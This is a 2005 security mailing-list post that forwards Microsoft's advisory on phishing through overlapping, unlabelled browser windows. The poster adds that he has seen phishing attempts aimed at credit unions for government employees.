[Dshield] Microsoft Security Advisory Notification (902333)

Al Reust areust at comcast.net
Wed Jun 22 04:15:19 GMT 2005


What make this notable is that I have received several trapped Credit Union 
"Phishing" attempts. I apologize that I can not provide more details 
(examples), other than they are aimed primarily at Federal, State employees 
and their Credit Unions (including EDU's). This also could provide 
information to target account and personal information of those specific 
users. The larger threat includes "users" would tend to use the same 
password wherever they can. The examination of several attempts show that 
multiple windows were launched to mask what the user would see. The 
attempts were trapped by the email gateway and examined, some of the first 
few attempts "do not" always follow proper mail rules.

Yes this advisory is long overdue, and is browser independent.

Browser Windows Without Indications of Their Origins may be Used in 
Phishing Attempts
Published: June 21, 2005

Microsoft has investigated a public report of a phishing method that 
affects Web browsers in general, including Internet Explorer.
The report describes the scenario of multiple, overlapping browser windows, 
some of which contain no indications of their origin. An attacker could 
arrange windows in such a way as to trick users into thinking that an 
unidentified dialog or pop-up window is trustworthy when it is in fact 
fraudulent. When a user visits a malicious Web site the user may be 
redirected to a trusted Web site. The attacker could then display an 
overlapping window in the form of a dialog box attempting a phishing 
attack. The user is then prompted to input personal information into this 
dialog box, which was opened from the malicious Web site. The user might 
believe that this dialog box was opened by the trusted Web site and they 
might input personal information. However, this information is sent to the 
malicious Web site.

http://www.microsoft.com/technet/security/advisory/902333.mspx

This affects "most" web browsers.

R/

Al





More information about the list mailing list